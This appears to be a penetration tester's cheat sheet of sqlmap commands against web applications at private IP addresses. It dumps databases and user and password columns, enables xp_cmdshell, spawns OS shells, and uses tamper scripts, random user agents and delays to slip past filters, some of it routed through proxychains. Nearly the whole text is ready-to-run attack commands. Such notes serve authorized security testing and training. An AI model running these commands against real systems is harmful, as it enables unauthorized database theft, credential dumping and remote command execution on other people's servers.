==============================================================================
[+] SQLmap 
==============================================================================

proxychains sqlmap -u http://172.16.1.12/blog/single.php?id=4 --level 5 --risk 3 --dbms mysql --threads 10 --dump
proxychains sqlmap -u http://172.16.1.12/blog/single.php?id=4 --level 5 --risk 3 --dbms mysql --threads 10 --dump -D "blog_admin_db"
proxychains sqlmap -u http://172.16.1.12/blog/single.php?id=4 --level 5 --risk 3 --dbms mysql --threads 10 --dump -D "blog_admin_db" -T "membership_users"
proxychains sqlmap -u http://172.16.1.12/blog/single.php?id=4 --level 5 --risk 3 --dbms mysql --threads 10 --dump -D "blog_admin_db" -T "membership_users" -C "Users,Passwords"

# Enable xp_cmdshell
sqlmap -u http://10.10.10.12/Visitas.aspx?IdEvento=%27 -D 'DB' --sql-shell --level 2 --risk 1
sql-shell> SELECT * FROM sys.databases;
sql-shell> EXECUTE sp_configure 'xp_cmdshell', 1; 
sql-shell>  ...  OK

# Execute xp_cmdshell
sqlmap -u http://10.10.10.12/ModificarVisitas.aspx?IdEvento=%27 -D 'DB' --os-shell --level 2 --risk 1


==============================================================================
[+] SQLmap with request
==============================================================================
# Blind SQLI DAta Dump steps 
sqlmap -r req.req --level 3 --risk 3
sqlmap -r req.req --level 3 --risk 3 --dbs
sqlmap -r req.req --level 3 --risk 3 --dbs --os-shell
sqlmap -r req.req --level 3 --risk 3 --dbs -D "database_name" --tables
sqlmap -r req.req --level 3 --risk 3 --dbs -D "database_name" -T "users" --columns
sqlmap -r req.req --level 3 --risk 3 --dbs -D "database_name" -T "users" -C "user" --dump
sqlmap -r req.req --level 3 --risk 3 --dbs -D "database_name" -T "users" -C "password" --dump

proxychains sqlmap -r request2.req --level 2 --risk 1

# Specific Parameter
proxychains sqlmap -r request2.req --level 2 --risk 1 -p id --tamper="space2comment,charencode.py"

proxychains sqlmap -r reqsqlmap.req --dbs
proxychains sqlmap -r reqsqlmap.req  -D "db_crm" --tables 

# Tamper

sqlmap -r req.req --level 3 --risk 3 --tamper=space2comment,between --delay=5 --random-agent --threads=1 --batch

==============================================================================
[+] SQLmap fix connection or force https
==============================================================================
# --force-ssl
sqlmap -r req.req --force-ssl

# view on burp suite
sqlmap -r req.req --random-agent --proxy="https://192.168.20.43:8090" --force-ssl

#file name parameter nad ignore code 500 
sqlmap -r req.req --level 3 --risk 3 -p 'filename' --force-ssl --dump --technique T --ignore-code 500

